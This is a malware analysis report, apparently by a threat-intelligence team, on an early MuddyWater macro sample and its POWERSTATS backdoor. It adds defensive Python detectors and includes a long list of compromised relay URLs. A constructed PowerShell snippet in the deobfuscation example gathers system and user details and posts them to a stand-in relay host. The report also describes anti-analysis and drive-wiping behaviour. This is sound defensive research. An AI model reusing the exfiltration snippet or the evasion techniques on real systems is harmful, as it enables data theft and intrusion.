Overview
The MuddyWater APT group was disclosed and named by Unit42 in February 2017. It is believed to originate from the Middle East and mainly attacks neighbouring countries and other regions. The group's early activity overlapped with the FIN7 group, but because their motivations are completely different the two are tracked as separate groups.
MuddyWater's attacks usually begin with targeted e-mails sent to an organisation; legitimate documents are then stolen from compromised systems inside that organisation, weaponised, and distributed to further victims. A hallmark of its attacks is the use of a heavily obfuscated PowerShell backdoor known as POWERSTATS.
MuddyWater has stayed active since its disclosure: security vendors keep reporting new samples and new backdoor variants, and its TTPs are continually updated. Since May 2018 its primary targets have shifted to telecommunications and IT service providers, government agencies and military entities in Middle Eastern countries [1].
Recently, the RedDrip team of the Qi An Xin Threat Intelligence Center captured a sample that analysis showed to be an early MuddyWater sample, an old sample newly uploaded. Because the POWERSTATS backdoor has consistently evaded antivirus detection well, this article dissects MuddyWater's early attack tooling and techniques. The decoy document captured this time is shown in the figure below:
Sample information
The captured sample uses the same lure as earlier attacks: a blurred background image pushes the victim into clicking to enable macros. Basic information on the sample:
File name | 3.doc
MD5 | eccb7346fca1032b8efdb8d458bbe53f
File format | Word Document
File size | 651776 bytes
Detailed analysis
The initial infection starts with a macro-enabled Office 97-2003 Word file; the macro is usually password-protected to hinder static analysis.
The main payload in the macro code is Base64-encoded. The macro decodes three encrypted blobs; its main job is to write the three decoded blobs into the "ProgramData" directory under their respective names, and then to achieve persistence through a registry Run (startup) entry.
Dropper
The dropped EventManager.logs mainly registers the dropped EventManager.dll through scrobj.dll (the Microsoft Scriptlet library).
The dropped EventManager.dll is in fact an XML file containing heavily obfuscated JS code.
Decoding the JS code finally yields a piece of PowerShell code.
This code mainly decrypts and executes the dropped WindowsDefenderService.ini file; once decrypted, that file is another piece of obfuscated PowerShell, the POWERSTATS backdoor that MuddyWater has relied on for a long time.
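The dropper chain described in the macro and Dropper sections leaves several host-side traces: an Office process writing files into ProgramData, a Run key pointing at a ProgramData file with a non-executable extension, regsvr32 loading a scriptlet through scrobj.dll, and later a .ps1 script appearing in ProgramData. The following Python script is an added detection example written for this article; it is not code from the sample or from Qi An Xin. The event format is a simplified Sysmon-style dictionary, and the regsvr32 command line and the Run-key launcher are assumptions about how the dropped files are invoked, since the report does not quote them.

```python
import re
from dataclasses import dataclass

# Constructed, simplified Sysmon-style events (not taken from the sample).
# The Run-key launcher ("wscript.exe //B ...") and the regsvr32 command line
# are assumptions about how the dropped files are invoked.
SAMPLE_EVENTS = [
    {"type": "FileCreate",
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "target": r"C:\ProgramData\WindowsDefenderService.ini"},
    {"type": "RegistrySet",
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\EventManager",
     "data": r"wscript.exe //B C:\ProgramData\EventManager.logs"},
    {"type": "ProcessCreate",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /i:C:\ProgramData\EventManager.dll scrobj.dll"},
    {"type": "FileCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\ProgramData\a.ps1"},
    {"type": "ProcessCreate",   # benign control event, must not be flagged
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r"chrome.exe --type=renderer"},
]

PROGRAMDATA_PATH = re.compile(r"c:\\programdata\\[^\s\"']+", re.IGNORECASE)
OFFICE_IMAGES = ("winword.exe", "excel.exe", "powerpnt.exe")


@dataclass
class Finding:
    rule: str
    detail: str


def check_event(ev):
    """Return a Finding for one event, or None if nothing matches."""
    kind = ev["type"]
    if kind == "ProcessCreate":
        cmd = ev.get("cmdline", "")
        # regsvr32 loading a scriptlet through scrobj.dll; "/i:" names the script file
        if "scrobj.dll" in cmd.lower() and "/i:" in cmd.lower():
            return Finding("regsvr32-scriptlet", cmd)
    elif kind == "RegistrySet":
        # autostart value whose data references something under ProgramData
        if r"\currentversion\run" in ev.get("key", "").lower():
            m = PROGRAMDATA_PATH.search(ev.get("data", ""))
            if m:
                return Finding("run-key-programdata", f"{ev['key']} -> {m.group(0)}")
    elif kind == "FileCreate":
        target = ev.get("target", "")
        if PROGRAMDATA_PATH.fullmatch(target):
            # an Office application dropping files into ProgramData
            if ev.get("image", "").lower().endswith(OFFICE_IMAGES):
                return Finding("office-writes-programdata", target)
            # a PowerShell script written into ProgramData (the later screenshot stage)
            if target.lower().endswith(".ps1"):
                return Finding("ps1-in-programdata", target)
    return None


def scan(events):
    """Run every event through check_event and keep the hits, in event order."""
    return [f for f in map(check_event, events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.detail}")
```

Each rule on its own is noisy (software installers also write to ProgramData); the value lies in seeing several of them from the same host within a short window, which is why the script keeps the findings in event order rather than collapsing them.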
After peeling off several layers of decryption we obtained barely readable code. Closer study showed that the function names and some variable names are obfuscated with ROT13; once that is undone, the full POWERSTATS backdoor comes into view.
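Because ROT13 is its own inverse, the naming layer described above can be stripped mechanically, but only the script's own symbols should be rotated; applying ROT13 to built-in cmdlets such as Get-WmiObject would wreck them. The Python helper below is an added example for this article, not the team's tooling or the POWERSTATS code: it collects the names the script itself declares (function names, function parameters and assigned variables), ROT13s those in a single pass, and leaves every other token alone. The PowerShell snippet it runs on is constructed to mimic the naming scheme and is not the real backdoor.

```python
import codecs
import re

# Constructed sample mimicking the naming scheme described above (not the real
# POWERSTATS code): script-defined function and variable names are ROT13'd,
# while built-in cmdlets such as Get-WmiObject are left untouched.
OBFUSCATED = r'''
$hey = "hxxp://relay.example.invalid/db-config-ini.php"
function Trg-FlfVasb {
    $bfAnzr = (Get-WmiObject Win32_OperatingSystem).Caption
    $hfre = $env:USERNAME
    return "$bfAnzr|$hfre"
}
function Fraq-Ercbeg($qngn) { Invoke-WebRequest -Uri $hey -Method Post -Body $qngn }
Fraq-Ercbeg (Trg-FlfVasb)
'''

FUNC_DECL = re.compile(r'function\s+([\w-]+)\s*(?:\(([^)]*)\))?', re.IGNORECASE)
ASSIGN = re.compile(r'\$(\w+)\s*=(?!=)')        # "$name = ..." but not "=="
PARAM_VAR = re.compile(r'\$(\w+)')
TOKEN = re.compile(r'\$\w+|\b[A-Za-z][\w-]*\b')  # variables and Verb-Noun style names
BUILTIN_VARS = {'env', 'true', 'false', 'null', '_', 'args', 'PSScriptRoot'}


def rot13(text):
    """ROT13 rotates letters only; digits, '$' and '-' pass through unchanged."""
    return codecs.decode(text, 'rot_13')


def declared_symbols(src):
    """Return (function names, variable names) that the script itself defines."""
    funcs, variables = set(), set()
    for m in FUNC_DECL.finditer(src):
        funcs.add(m.group(1))
        if m.group(2):                      # parameter list, e.g. "($qngn)"
            variables.update(PARAM_VAR.findall(m.group(2)))
    variables.update(ASSIGN.findall(src))
    return funcs, variables - BUILTIN_VARS


def deobfuscate_identifiers(src):
    """Rotate every occurrence of a script-defined name in one pass.

    A single pass over the token stream avoids the chained-replacement trap
    where one rotated name accidentally matches another declared name.
    Returns the rewritten source and the name mapping that was applied.
    """
    funcs, variables = declared_symbols(src)
    mapping = {f: rot13(f) for f in funcs}
    mapping.update({'$' + v: '$' + rot13(v) for v in variables})
    rewritten = TOKEN.sub(lambda m: mapping.get(m.group(0), m.group(0)), src)
    return rewritten, mapping


if __name__ == "__main__":
    cleaned, names = deobfuscate_identifiers(OBFUSCATED)
    for before, after in sorted(names.items()):
        print(f"{before:15} -> {after}")
    print(cleaned)
```

The mapping it prints doubles as a quick sanity check: if a "decoded" name is still gibberish, that symbol was obfuscated with something other than ROT13 and needs a closer look.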
It first disables Office's macro warnings and Protected View so that later attacks need no user interaction, and enables the option that lets macro code access the internal VBA object model so that later macros can run more stealthily. It also sets registry Run entries and scheduled tasks for persistence.
It enumerates the running processes and computes a checksum of each process name; if one matches a hard-coded checksum, it triggers a BSOD through the NtRaiseHardError function in ntdll.dll.
The process names checked are:
win32_remote
win64_remote64
ollydbg
ProcessHacker
tcpview
autoruns
filemon
procmon
regmon
procexp
idaq
idaq64
ImmunityDebugger
Wireshark
dumpcap
HookExplorer
ImportREC
PETools
LordPE
SysInspector
proc_analyzer
sysAnalyzer
sniff_hit
windbg
joeboxcontrol
joeboxserver
It then decrypts the URLs of its proxies and picks one at random. The random proxies hide the real address of the C2 server: the infected endpoint connects to one of the proxy servers at random, and that proxy relays the traffic on to the C2, which makes tracking harder.
Some of the decrypted proxy URLs:
Next it collects the victim's OS version, internal IP, OS bitness, computer name, workgroup and user name, encrypts them and sends them to the randomly selected proxy URL to register a new victim. This lets the attackers accept or reject victims by IP, country, geographic location, target organisation and so on. Depending on the response from the attackers' CnC, the victim is assigned an ID, which is then sent with every request for commands to the CnC.
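On the network side, the relay scheme described above has one consistent feature in this report: every proxy URL in the IOC list ends in the same file name, db-config-ini.php, hosted on otherwise legitimate, compromised websites. The following Python script is an added example for this article (not Qi An Xin's detection logic): it walks constructed proxy log lines, flags requests to the listed relay hosts, flags the relay file name on hosts that are not yet listed, and counts relay contacts per internal client. The log format and client addresses are constructed; the three IOC hosts are a subset of the list at the end of this report. Because the relay hosts are legitimate sites, a hit on the host alone is kept as informational only; the full URL path is the reliable indicator.

```python
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlparse

# Shared file name of every relay URL in the IOC list of this report
RELAY_PATH = "db-config-ini.php"

# Subset of the relay hosts from the IOC list (enough for the demo)
IOC_HOSTS = {"www.theharith.com", "www.easy-home-sales.co.za", "harryandbell.com"}

# Constructed proxy log lines (not real traffic): "<timestamp> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2019-01-07T09:12:01Z 10.0.0.21 POST http://www.easy-home-sales.co.za/wp-includes/db-config-ini.php 200
2019-01-07T09:12:02Z 10.0.0.21 GET http://www.easy-home-sales.co.za/index.php 200
2019-01-07T09:14:33Z 10.0.0.21 POST http://unlisted-site.example/blog/wp-admin/db-config-ini.php 200
2019-01-07T09:15:10Z 10.0.0.42 GET https://update.example/config.ini 200
2019-01-07T09:16:44Z 10.0.0.42 POST http://harryandbell.com/wp-admin/db-config-ini.php 200
"""

# Rules that count as a relay contact; "ioc-host-other-path" is informational only
BEACON_RULES = {"known-relay-url", "relay-path-pattern"}


@dataclass
class Finding:
    rule: str
    client: str
    url: str


def classify(url):
    """Map one URL to a rule name, or None when it is not interesting.

    Defanged IOC notation (hxxp://) parses as well, so the IOC list itself
    can be fed through this function.
    """
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    relay_path = parsed.path.lower().rstrip("/").endswith("/" + RELAY_PATH)
    if host in IOC_HOSTS:
        return "known-relay-url" if relay_path else "ioc-host-other-path"
    if relay_path:
        return "relay-path-pattern"   # candidate relay not yet in the IOC list
    return None


def analyze(log_text):
    """Parse the log and return one Finding per interesting request, in order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, _method, url, _status = line.split()
        rule = classify(url)
        if rule:
            findings.append(Finding(rule, client, url))
    return findings


def beaconing_clients(findings):
    """Count relay contacts per internal client, ignoring informational hits."""
    return Counter(f.client for f in findings if f.rule in BEACON_RULES)


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for h in hits:
        print(f"[{h.rule}] {h.client} -> {h.url}")
    print("relay contacts per client:", dict(beaconing_clients(hits)))
```

The "relay-path-pattern" rule is the one worth tuning: the relay file name is specific enough that a hit on an unlisted host is a good pivot for discovering further compromised relays, exactly the kind of correlation the report describes later.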
It checks whether the c:\programdata directory contains the antivirus products Kasper, Panda, ESET, Symantec or McAfee; if none is present it starts capturing and uploading screenshots. The screenshot code is written out as the script c:\programdata\a.ps1 and executed through the DDEInitiate function, after which the script is deleted to remove traces.
It parses the remote-control commands returned by the CnC and performs the corresponding action. The commands are:
Command | Function
reboot | Reboot the machine
shutdown | Shut the machine down
clean | Silently wipe drives C, D, E and F, then reboot
screenshot | Take a screenshot and upload it
upload | Download a file
Correlation analysis
Analysis of the captured sample's attack techniques and code logic shows that it is essentially identical to the attack techniques and malicious code MuddyWater commonly used in its early days.
Pivoting on the compromised proxy URLs also turns up related early MuddyWater samples on VT.
File name | Lisfon.exe
MD5 | fa200e715e856550c76f729604ebaf57
File format | Win32 EXE
File size | 95232 bytes
Conclusion
As the situation in the Middle East evolves, APT activity there has become highly complex, with all sides probing each other for intelligence and conducting espionage. To avoid detection and ensure its attacks succeed, MuddyWater keeps upgrading its TTPs: from the single POWERSTATS backdoor it has gradually diversified into RATs written in Python, C# and PowerShell, and even malware for the Android platform.
MuddyWater has always been adept at social engineering for spear-phishing e-mail attacks. Because the files dropped by the initial macro in this sample are heavily obfuscated, detection rates among the major security vendors have remained low. MuddyWater also uses compromised proxy websites to relay the real C2's commands, which evades tracking well.
The sample captured here mainly targets the Middle East; no impact on users in China has been observed so far. The Qi An Xin RedDrip team reminds users not to open links of unknown origin shared on social media, not to click or run e-mail attachments from unknown senders, not to run unknown files with sensational titles, and not to install apps from unofficial sources. Back up important files regularly and install patches promptly.
If you need to run or install an application of unknown origin, you can first check it with the Qi An Xin Threat Intelligence file deep-analysis platform (https://sandbox.ti.qianxin.com/sandbox/page), which currently supports deep analysis of many file formats for Windows, Android and other platforms.
All products built on the Qi An Xin Threat Intelligence Center's threat intelligence data, including the Qi An Xin Threat Intelligence Platform (TIP), Tianqing, the Tianyan advanced threat detection system, Qi An Xin NGSOC and Qi An Xin Situational Awareness, already support precise detection of this type of attack.
IOCs
MD5
eccb7346fca1032b8efdb8d458bbe53f
161c4a04ff1d64e750babcd6ead676e6
1def9f57402f69089f31357e578ef394
321d62fa4a7eaa8d19c3275d6775f55d
URL
hxxps://www.theharith.com/wp-includes/db-config-ini.php
hxxp://www.easy-home-sales.co.za/wp-includes/db-config-ini.php
hxxp://www.rashidalinawabshahi.com/ranwp/wp-admin/db-config-ini.php
hxxps://allinonebusinessresources.com/wp-includes/db-config-ini.php
hxxps://amishcountryfurnishings.com/awstats/db-config-ini.php
hxxp://vumavaluations.co.za//db-config-ini.php
hxxp://harryandbell.com/wp-admin/db-config-ini.php
hxxp://admiralgaragedoorrepair.com/wp-admin/db-config-ini.php
hxxp://viewphotos.co.za//db-config-ini.php
hxxp://supersavari.com/wp-admin/db-config-ini.php
hxxp://www.mzansicompanies.co.za/wp-includes/db-config-ini.php
hxxps://bloggingio.com//db-config-ini.php
hxxp://www.loansonhomes.co.za/wp-admin/db-config-ini.php
hxxp://ppe4u.co.za/system/db-config-ini.php
hxxp://www.gilforsenate.com//db-config-ini.php
hxxp://www.getcord.co.za/wp-admin/db-config-ini.php
hxxp://www.thusoconsulting.co.za/wp-admin/db-config-ini.php
hxxp://mgamule.co.za/css/db-config-ini.php
hxxp://chrisdejager-attorneys.co.za//db-config-ini.php
hxxp://sajidenterprises.com/contact/db-config-ini.php
hxxp://alxcorp.com/css/db-config-ini.php
hxxp://epss.ae/lib/db-config-ini.php
hxxp://canadianvc.com/includes/db-config-ini.php
hxxp://saacma.co.za//db-config-ini.php
hxxp://rsbholdings.co.za//db-config-ini.php
hxxp://adupree.com//db-config-ini.php
hxxp://www.atcouriers.co.za//db-config-ini.php
hxxp://transactionjunction.co.za//db-config-ini.php
hxxp://hisabati.com/include/mailchimp/db-config-ini.php
hxxp://www.duotonedigital.co.za//db-config-ini.php
hxxp://finalnewstv.com//db-config-ini.php
hxxp://www.tanati.co.za//db-config-ini.php
hxxp://emware.co.za/includes/db-config-ini.php
hxxp://breastfeedingbra.co.za//db-config-ini.php
hxxp://www.androidwikihow.com//db-config-ini.php
hxxp://cashforyousa.co.za/wpscripts/db-config-ini.php
hxxp://nolandsintl.com/templates/db-config-ini.php
hxxp://photoboothotm.co.za/components/db-config-ini.php
hxxp://roshnee.co.za//db-config-ini.php
hxxp://hesterwebber.co.za//db-config-ini.php
hxxp://sadcta-client.co.za/shopping/db-config-ini.php
hxxp://fickstarelectrical.co.za/DataCapture/db-config-ini.php
hxxp://xclusivenetwork.com/wp-includes/db-config-ini.php
hxxp://cc.com.pk/css/_vti_cnf/db-config-ini.php
hxxp://www.aoryx.ae/whitelilies.ae/db-config-ini.php
hxxp://pinnacleweld.co.za//db-config-ini.php
hxxp://airplussa.co.za/wp-admin/db-config-ini.php
hxxp://www.ieced.com.pk/wp-includes/db-config-ini.php
hxxp://foryou.guru/css/db-config-ini.php
hxxps://americanbrasil.com.br/downloader/db-config-ini.php
hxxp://oc.tsfengineering.com/resources/db-config-ini.php
hxxps://bigbaazaronline.com/wp-includes/db-config-ini.php
hxxp://jwseshowe.co.za/assets/db-config-ini.php
hxxp://goldeninstitute.co.za/contents/db-config-ini.php
hxxp://panathimaids.co.za/js/db-config-ini.php
hxxp://advss.co.za/images/db-config-ini.php
hxxp://ednpk.com//db-config-ini.php
hxxp://malbus.net/b/db-config-ini.php
hxxp://proeventsports.co.za/wp-admin/db-config-ini.php
hxxp://glenbridge.co.za//db-config-ini.php
hxxp://berped.co.za//db-config-ini.php
hxxp://best-digital-slr-cameras.com/privacy/db-config-ini.php
hxxps://kamas.pk/wp-admin/db-config-ini.php
hxxp://www.printinghub.co.za//db-config-ini.php
hxxps://cultofmobile.com/wp-includes/db-config-ini.php
hxxp://kkattorneys.com.pk/libraries/joomla/error/db-config-ini.php
hxxp://roseace.com.pk/components/com_djimageslider/db-config-ini.php
hxxp://www.bgoodideas.com/wp-includes/db-config-ini.php
hxxp://aljasar.com/Dining-Trendz/db-config-ini.php
hxxp://vatmiddleeast.com//wp-content/themes/twentyseventeen/inc/db-config-ini.php
hxxp://www.evoko.ae//db-config-ini.php
hxxp://totallyfreepeoplesearch.org//db-config-ini.php
hxxp://www.exuberant-group.com/wp-includes/db-config-ini.php
hxxp://delectronics.com.pk//db-config-ini.php
hxxp://www.bashancorp.co.za//db-config-ini.php
hxxp://bitsym.com/wp-content/plugins/duplicate-page/db-config-ini.php
hxxp://www.penisdevelopmentcentre.co.za//db-config-ini.php
hxxp://visionclinic.co.ls/includes/db-config-ini.php
hxxp://fgpcw-kr.edu.pk/wp-admin/includes/db-config-ini.php
hxxp://gemana.ae/wp-includes/db-config-ini.php
hxxp://bmctelecom.ae/test/shamayal/db-config-ini.php
hxxps://www.addsaintgaudens.com/wp-admin/db-config-ini.php
hxxp://www.buhlebayoacademy.com//db-config-ini.php
hxxp://capitalradiopetition.co.za/script/db-config-ini.php
hxxp://koldpressjuice.com/wp-includes/Requests/db-config-ini.php
hxxp://victorypipe.com.pk/wp-includes/db-config-ini.php
hxxp://vintage.ae//wp-includes/Text/Diff/db-config-ini.php
hxxp://almaqsd.com/wp-admin/db-config-ini.php
hxxp://www.diginixtech.com//db-config-ini.php
hxxp://www.sorumvar.net//db-config-ini.php
hxxp://bios-chip.co.za//db-config-ini.php
hxxp://www.crissamconsulting.co.za//db-config-ini.php
hxxp://capriflower.co.za//db-config-ini.php
hxxp://www.dingaanassociates.co.za/wp-includes/db-config-ini.php
hxxp://apidubai.ae/themes/en/db-config-ini.php
hxxp://batistadopovosjc.org.br//db-config-ini.php
hxxp://indiba-africa.co.za/includes/db-config-ini.php
hxxp://sprintpackersnmovers.com/spmbeta/db-config-ini.php
hxxp://www.proxelinternational.co.za/engine1/db-config-ini.php
hxxp://ngomahconstruction.co.za/js/db-config-ini.php
hxxp://clandecor.co.za/rvsUtf8Backup/db-config-ini.php
hxxp://bakron.co.za//db-config-ini.php
hxxp://plexsolutions.co.za/wp-includes/db-config-ini.php
hxxp://regionprinters.com/wp-admin/db-config-ini.php
hxxp://gsnconsulting.co.za/wp-admin/db-config-ini.php
hxxp://aahung.org/assets/db-config-ini.php
hxxp://heritagetravelmw.com//db-config-ini.php
hxxp://shgida.com/wp-includes/customize/db-config-ini.php
hxxp://www.afikaquadpro.com//db-config-ini.php
hxxps://news9pakistan.com/wp-admin/db-config-ini.php
hxxp://havilahglo.co.za/wpimages/db-config-ini.php
hxxp://www.paktechinfo.com/wp-includes/db-config-ini.php
hxxp://gcmbdin.edu.pk//db-config-ini.php
hxxp://www.thoughtsandthings.co.za/wp-includes/db-config-ini.php
hxxp://clouditzone.com/revolution/assets/db-config-ini.php
hxxp://rollotech.co.za//db-config-ini.php
hxxp://genesisbs.co.za//db-config-ini.php
hxxps://www.bornear.com/components/db-config-ini.php
hxxp://insafradio.pk/his/db-config-ini.php
hxxp://www.harmonyguesthouse.co.za/wp-includes/db-config-ini.php
hxxp://www.cle.ae//db-config-ini.php
hxxp://triumphsportscarclub-kzn.co.za//db-config-ini.php
hxxp://www.mycogentrading.com//db-config-ini.php
hxxp://betatechnologiesme.com//db-config-ini.php
hxxp://pgpaltex.co.za//db-config-ini.php
hxxp://strictlybusiness.co.za/wpscripts/db-config-ini.php
hxxp://www.volleybold.com//templates/system/db-config-ini.php
hxxp://dusttek.com.tr/yonet/tinymce/examples/db-config-ini.php
hxxp://zafarhalalmeat.com.pk//db-config-ini.php
hxxp://desirablehair.co.za/documents/db-config-ini.php
hxxp://comsip.org.mw/sync/db-config-ini.php
hxxp://www.wbdrivingschool.com//db-config-ini.php
hxxp://jdcorporate.co.za/multiseller/db-config-ini.php
hxxp://jumpstart.ae//db-config-ini.php
hxxps://www.tsmgranite.com//db-config-ini.php
hxxps://boatwif.co.uk/wp-includes/db-config-ini.php
hxxp://www.soccerkidsdubai.com//wp-content/plugins/db-config-ini.php
hxxp://adsbook.co.za/a/db-config-ini.php
hxxp://hashtag.com.pk/test/db-config-ini.php
hxxp://host4unix.net/jorani/db-config-ini.php
hxxp://mepure.com/wp-includes/widgets/db-config-ini.php
hxxp://dorakiletisim.com/resimler/dorak/db-config-ini.php
hxxp://tosmacakes.co.za//db-config-ini.php
hxxp://seloanaholdings.co.za/js/db-config-ini.php
hxxp://jvpsfunerals.co.za//db-config-ini.php
hxxp://absfinancialplanning.co.za/images/db-config-ini.php
hxxp://tcpbereka.co.za/js/db-config-ini.php
hxxp://www.nalitravel.co.za//db-config-ini.php
hxxp://simplyplumbing.co.za//db-config-ini.php
hxxp://investaholdings.co.za/htc/db-config-ini.php
hxxp://djtrina.com/wp-includes/theme-compat/db-config-ini.php
hxxp://sallyscott.co.za/templates/db-config-ini.php
hxxp://findinfo-more.com//db-config-ini.php
hxxp://www.amazingtour.pk//db-config-ini.php
hxxp://rmbmanufactures.co.za//db-config-ini.php
hxxp://web28tech.co.za/weather/db-config-ini.php
hxxp://irshadfoundation.co.za//db-config-ini.php
hxxp://nabtires.com/z-backup/search/db-config-ini.php
hxxp://cds.org.pk//db-config-ini.php
hxxp://ladiescircle.co.za/wp-admin/db-config-ini.php
hxxps://betterstep.ae/wp-admin/db-config-ini.php
hxxp://luxconprojects.co.za/wp-includes/db-config-ini.php
hxxp://wegallop.com//db-config-ini.php
hxxp://www.10shapes.com/wp-includes/db-config-ini.php
hxxp://sinebar.co.za//db-config-ini.php
hxxp://www.hfhl.org.ls/images/db-config-ini.php
hxxp://laraibgroup.com/plugins/editors/tinymce/db-config-ini.php
hxxp://beachroad.ae/wp-includes/IXR/db-config-ini.php
hxxp://ventronics.co.za/vent1/db-config-ini.php
hxxp://www.speedmasterprinters.co.za//db-config-ini.php
hxxp://www.ffc.com.pk/wp-admin/includes/db-config-ini.php
hxxp://cemsolutions.org/wp-admin/db-config-ini.php
hxxp://www.ipripak.org/wp-includes/theme-compat/db-config-ini.php
hxxp://awuav.world//db-config-ini.php
hxxp://albedogida.com/Eski_web/db-config-ini.php
hxxp://bluewaves.ae/switcher/js/db-config-ini.php
hxxp://nakoserum.com/wp-admin/includes/db-config-ini.php
hxxp://aniroleplay.net//db-config-ini.php
hxxp://bgpsouthasia.com/tracking/db-config-ini.php
hxxp://fccltest.nayatel.com/wp-includes/theme-compat/db-config-ini.php
hxxp://welcomecaters.com/wp-includes/db-config-ini.php
hxxp://www.galwayprimary.co.za//db-config-ini.php
hxxp://pmdpk.com//db-config-ini.php
hxxp://cambridgetuts.com/css/db-config-ini.php
hxxps://lahorewholesalemarket.com/wp-admin/db-config-ini.php
hxxp://mepetresources.com/website/db-config-ini.php
hxxp://anzanihealth.co.za/wpimages/db-config-ini.php
hxxp://gvs.com.pk/font-awesome/db-config-ini.php
hxxp://geetransfers.co.za/font-awesome/db-config-ini.php
hxxp://dmc.gov.pk/libraries/phpmailer/db-config-ini.php
hxxp://elevate.ae/wp-includes/SimplePie/db-config-ini.php
hxxp://rsmaluminium.co.za//db-config-ini.php
hxxp://carlagrobler.co.za/components/db-config-ini.php
hxxp://paksteel.com//db-config-ini.php
hxxp://azadpattanhpp.com/xfiles/db-config-ini.php
hxxp://www.blaahblaah.com/Snaps/db-config-ini.php
hxxp://wmcsoj.edu.pk//db-config-ini.php
hxxp://lensofafrica.co.za/wpscripts/db-config-ini.php
hxxps://artumus.co.za//db-config-ini.php
hxxp://greenacrestf.co.za/video/db-config-ini.php
hxxp://www.tonaro.co.za/wp-includes/db-config-ini.php
hxxp://rmbmanufacturers.co.za/DataCapture/db-config-ini.php
hxxp://simpexbpo.com/wp-includes/db-config-ini.php
hxxp://ambiances-toiles.fr//db-config-ini.php
hxxp://tepsecurity.co.za//db-config-ini.php
hxxp://tophillsports.com/wp-includes/db-config-ini.php
hxxp://chrishanicdc.org/wpimages/db-config-ini.php
hxxp://www.britishasia-equip.co.uk//db-config-ini.php
hxxp://assemblee-nationale.cg/image/db-config-ini.php
hxxp://bonasfalogtrans.com/images/db-config-ini.php
hxxp://sonafoundation.org.pk//db-config-ini.php
hxxp://entracorntrading.co.za//db-config-ini.php
hxxps://dailysportsgossips.com/wp-includes/db-config-ini.php
hxxp://plantconsultants.co.za//db-config-ini.php
hxxp://chickenandkitchen.com//db-config-ini.php
hxxp://suzzyshuttles.co.za//db-config-ini.php
hxxp://siyabuselelatransport.co.za/swf/db-config-ini.php
hxxps://www.hosthof.com/phpmailer/db-config-ini.php
hxxp://assuredfirst.com/wp-includes/db-config-ini.php
hxxp://signsoftime.co.za/user/db-config-ini.php
hxxp://neomfarming.com//db-config-ini.php
hxxp://mumtazandbrohi.com/wp-includes/db-config-ini.php
hxxp://immaculatepainters.co.za/upload/db-config-ini.php
hxxp://charispaarl.co.za//db-config-ini.php
hxxp://indlovusecurity.co.za//db-config-ini.php
hxxp://www.aladiyat.ae/centers/db-config-ini.php
hxxp://www.popfilms.co.za//db-config-ini.php
hxxp://atexmodels.co.za//db-config-ini.php
hxxp://www.s5ncertificationservices.co.za//db-config-ini.php
hxxp://mhealth.ae//db-config-ini.php
hxxp://www.terapine.com//db-config-ini.php
hxxp://botanikbahcesi.com/test/db-config-ini.php
hxxp://fragranceoil.co.za/wp-includes/db-config-ini.php
hxxp://gbti.org.pk/public_html/js/db-config-ini.php
hxxp://tippinggate.co.za/training/db-config-ini.php
hxxp://aqlaal.com/wp-includes/SimplePie/db-config-ini.php
hxxp://comfortex.co.za/php/db-config-ini.php
hxxp://deepgraphics.co.za//db-config-ini.php
hxxp://www.icapmecareers.com/wp-includes/db-config-ini.php
hxxps://iconicciti.com//db-config-ini.php
hxxp://mukhtarfeeds.com//db-config-ini.php
hxxp://souqwalls.com/wp-includes/rest-api/db-config-ini.php
hxxp://www.malboer.co.za/trendy1/db-config-ini.php
hxxp://sefikengfarm.co.ls//db-config-ini.php
hxxp://dailyqadamat.com//db-config-ini.php
hxxp://www.thelightcleaning.co.za/wp-admin/db-config-ini.php
hxxp://passright.co.za//db-config-ini.php
hxxp://aboutduvetcovers.com/Seller/db-config-ini.php
hxxp://www.britishofficefitout.com//db-config-ini.php
hxxp://seismicfactory.co.za/wp-admin/db-config-ini.php
hxxp://abadleabantu.co.za/fonts/db-config-ini.php
hxxp://mountsinaischool.edu.pk/wp-includes/theme-compat/db-config-ini.php
hxxp://www.gooline.net//db-config-ini.php
hxxp://africangypsyjazz.com/libraries/db-config-ini.php
hxxps://aquabsafe.com/wp-admin/db-config-ini.php
hxxp://pkix.pk//db-config-ini.php
hxxp://ahworld.com.pk/docs/products/heating-products/db-config-ini.php
hxxp://3axis.co/wp-admin/includes/db-config-ini.php
hxxp://chinamall.co.za//db-config-ini.php
hxxp://www.waohost.com/wp-includes/db-config-ini.php
hxxp://utor.co.za//db-config-ini.php
hxxp://www.odcpkintranet.org/wp-admin/includes/db-config-ini.php
hxxp://tombstonedesigns.co.za/libraries/db-config-ini.php
hxxp://yogakidsuae.com//wp-includes/customize/db-config-ini.php
hxxp://rashidalinawabshahi.com/ranwp/db-config-ini.php
hxxp://bmasokaprojects.co.za//db-config-ini.php
hxxp://whitepearlpro.co.za/font/db-config-ini.php
hxxp://itengineering.co.za/gatewaydiamond/db-config-ini.php
hxxp://arm.net.pk//db-config-ini.php
hxxp://www.acer-parts.co.za//db-config-ini.php
hxxp://simpowerlogistics.co.za//db-config-ini.php
hxxp://buildingstandards.com.pk/wp-admin/db-config-ini.php
hxxp://thepianostudio.co.za/wp-includes/db-config-ini.php
hxxp://mzuzulionsclub.org/modules/db-config-ini.php
hxxp://10x10guru.com//db-config-ini.php
hxxp://www.abies.co.za/wp-includes/db-config-ini.php
hxxp://candidsourcing.com/wp-includes/db-config-ini.php
hxxp://pkproud.com/roshitrust/db-config-ini.php
hxxp://ldams.org.ls/supplies/db-config-ini.php
hxxp://addorg.org/wp-includes/db-config-ini.php
hxxp://menaboracks.co.za/tmp/db-config-ini.php
hxxp://www.oursort.co.za/timothyowenauthor/db-config-ini.php
hxxps://bloggertemplates4u.com//db-config-ini.php
hxxp://boardaffairs.com/wpscripts/db-config-ini.php
hxxp://macleodphotography.com/theme/db-config-ini.php
hxxp://capetownway.co.za/wp-includes/db-config-ini.php
hxxp://www.tntfire.co.za/wp-admin/db-config-ini.php
hxxp://hartenboswaterpark.co.za/templates/db-config-ini.php
